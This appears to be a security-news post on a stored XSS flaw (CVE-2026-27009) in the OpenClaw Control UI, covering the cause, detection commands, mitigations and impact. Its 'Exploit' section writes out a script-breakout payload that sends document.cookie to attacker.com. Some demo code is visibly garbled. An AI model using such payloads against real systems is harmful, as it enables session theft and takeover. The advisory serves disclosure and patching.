OpenClaw, Stored Cross-Site Scripting (XSS), CVE-2026-27009 (Moderate)

Listen to this Post

The vulnerability is a stored Cross-Site Scripting (XSS) issue in the OpenClaw Control UI. The gateway’s HTML response previously injected the `assistantName` and `assistantAvatar` values directly into an inline `` tag sequence. An attacker with the ability to modify these assistant identity values (such as an admin or operator) could set them to a malicious string containing </script><script>alert(1)</script>. When the Control UI page is rendered, the browser encounters the early closing tag, terminates the original script block, and executes the attacker’s injected JavaScript in the same origin. This allows the attacker to steal session tokens, perform privileged actions, or deface the UI. The issue is present in `openclaw` npm package versions `<= 2026.2.14` and is fixed in version `2026.2.15` . Platform: OpenClaw npm Version: <=2026.2.14 Vulnerability: Stored Cross-Site Scripting Severity: Moderate severity Date: 2026-02-18

Prediction: Patched 2026-02-19

What Undercode Say:

Analytics

1. Check current OpenClaw version
openclaw --version
2. Inspect the rendered HTML of the Control UI to see the vulnerable script injection
curl -s http://localhost:18789/ | grep -A 2 "<script>.assistant"
3. Simulate the vulnerable code pattern in a test file to understand the behavior
cat > test-xss.js << 'EOF'
const assistantName = '</script><img src=x onerror=alert(origin)>';
const injected = <code><script>window.assistant = ${JSON.stringify(assistantName)};</script></code>;
console.log(injected);
// Observe that the output breaks out of the script tag
EOF
node test-xss.js
4. Check gateway logs for any unusual assistant name changes (requires appropriate log level)
grep -i "assistant.name.updated" ~/.openclaw/logs/gateway.log

Exploit

<!-- Step 1: An attacker with admin access sets a malicious assistant name via API or config -->
<!-- Example malicious payload for assistantName: -->
</script><script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>
<!-- Step 2: When any user visits the Control UI, the payload executes -->
<!-- The vulnerable page originally contained: -->
<script>window.assistantConfig = {"name":${JSON.stringify(assistantName)},"avatar":${JSON.stringify(assistantAvatar)}};</script>
<!-- Step 3: With the payload, it becomes: -->
<script>window.assistantConfig = {"name":"</script><script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>","avatar":"..."};</script>
<!-- The browser parses this as two script tags, executing the second one. -->

Protection

1. Upgrade to the patched version
npm install -g openclaw@latest
Verify the version is at least 2026.2.15
openclaw --version
2. Verify the fix: config is now served from a JSON endpoint, not inline
curl -s http://localhost:18789/api/bootstrap-config | jq .
3. Check that the Content Security Policy is active and restrictive
curl -I http://localhost:18789/ | grep -i content-security-policy
Expected: content-security-policy: script-src 'self'
4. If you cannot upgrade immediately, restrict access to the Control UI
to trusted networks only (e.g., localhost and VPN)
sudo ufw deny from any to any port 18789
sudo ufw allow from 127.0.0.1 to any port 18789
Also ensure the configuration endpoints are not exposed publicly

Impact

A successful exploit allows an attacker with configuration privileges to execute arbitrary JavaScript in the context of the OpenClaw Control UI. This can lead to theft of administrator session tokens, unauthorized modification of gateway settings, exposure of connected service credentials, and further compromise of the host system through chained attacks. Although the Control UI is intended for local use only, a compromised admin account or a cross-site request forgery attack on the configuration endpoints could trigger this stored XSS, affecting all users who subsequently visit the UI .

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top